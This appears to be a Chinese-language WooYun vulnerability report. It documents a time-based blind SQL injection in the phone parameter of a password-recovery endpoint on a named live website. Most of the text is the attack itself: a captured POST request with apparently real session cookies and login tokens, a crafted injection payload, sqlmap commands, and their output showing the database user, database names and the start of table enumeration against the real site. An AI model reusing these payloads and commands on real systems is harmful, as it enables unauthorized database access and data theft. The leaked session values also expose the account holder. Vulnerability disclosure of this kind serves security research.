WooYun.org

POST注入，而且还是时间盲注，丫的time-sec 搞到 200才给个结果，至于xss顺便提出来吧，别的地方还没来得及找，留给后人
抓包文件text.txt
POST /register/find_pw_getphone HTTP/1.1
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.hhrfs.com:443/
Cookie: WEB_PHPSESSID=ol1n68f2tckdf8thd15bk6vqk0; user_name=1908869379%40qq.com; user_id=7592; user_login_time=1439175469; user_login_token=cd996abd28bfa3b4089280d3dc3cdfac; PHPSESSID=8pvv4aedpbnfkfcgn0oukjuh50; ADMIN_PHPSESSID=s18ttov0el3vcbogi6oeuiitv3; Hm_lvt_61581e42189ee846e9853d7667f3c6f6=1439177355,1439177366,1439177417,1439177420; Hm_lpvt_61581e42189ee846e9853d7667f3c6f6=1439177420; ASP.NET_SessionId=f2mxwn45bg1ddv45qdblhd55; HMACCOUNT=8705296D8A2D6DF7; BAIDUID=8406EA95BAD0E7EE9F0F00DFCF8CED55:FG=1; pagesize=15
Host: www.hhrfs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
phone=-1'%20OR%203*2*1%3d6%20AND%2000017%3d00017%20or%20'HPy3sVRK'%3d'&__hash__=cc4a5c9fc451afbade0cb02d4d00b427_0f0115b67f6a7c409ccfad0a68f56881
C:\Python27\sqlmap>sqlmap.py -r test.txt --time-sec 200 --threads 5 between.py -
p phone --current-user --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150415}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:23:09
[17:23:09] [INFO] parsing HTTP request from 'test.txt'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q]
[17:23:10] [INFO] resuming back-end DBMS 'mysql'
[17:23:10] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: phone=-1' OR 32) AND (SELECT * FROM (SELECT(SLEEP(200)))dNHy) AND (
6158=61581=6 AND 00017=00017 or 'HPy3sVRK'='&__hash__=cc4a5c9fc451afbade0cb02d4d
00b427_0f0115b67f6a7c409ccfad0a68f56881
---
[17:23:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
current user: 'hhr@localhost'
[17:40:08] [INFO] fetching current database
[17:40:08] [INFO] retrieved: hhr
current database: 'hhr'
available databases [2]:
[*] hhr
[*] information_schema
C:\Python27\sqlmap>sqlmap.py -r test.txt --time-sec 200 --threads 5 between.py -
p phone --tables -D hhr
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150415}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:04:56
[18:04:56] [INFO] parsing HTTP request from 'test.txt'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q]
[18:04:57] [INFO] resuming back-end DBMS 'mysql'
[18:04:57] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: phone=-1' OR 32) AND (SELECT * FROM (SELECT(SLEEP(200)))dNHy) AND (
6158=61581=6 AND 00017=00017 or 'HPy3sVRK'='&__hash__=cc4a5c9fc451afbade0cb02d4d
00b427_0f0115b67f6a7c409ccfad0a68f56881
---
[18:05:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[18:05:03] [INFO] fetching tables for database: 'hhr'
[18:05:03] [INFO] fetching number of tables for database 'hhr'
[18:05:03] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[18:05:03] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
[18:06:15] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[18:06:16] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[18:06:27] [INFO] heuristics detected web page charset 'ascii'
113
[18:07:38] [INFO] retrieved: jee
本来就满，还那么多表,还让人吃饭不啊，不管了就这了
时间太慢了，我要吃饭长胖点，这样才能踏入渗透大道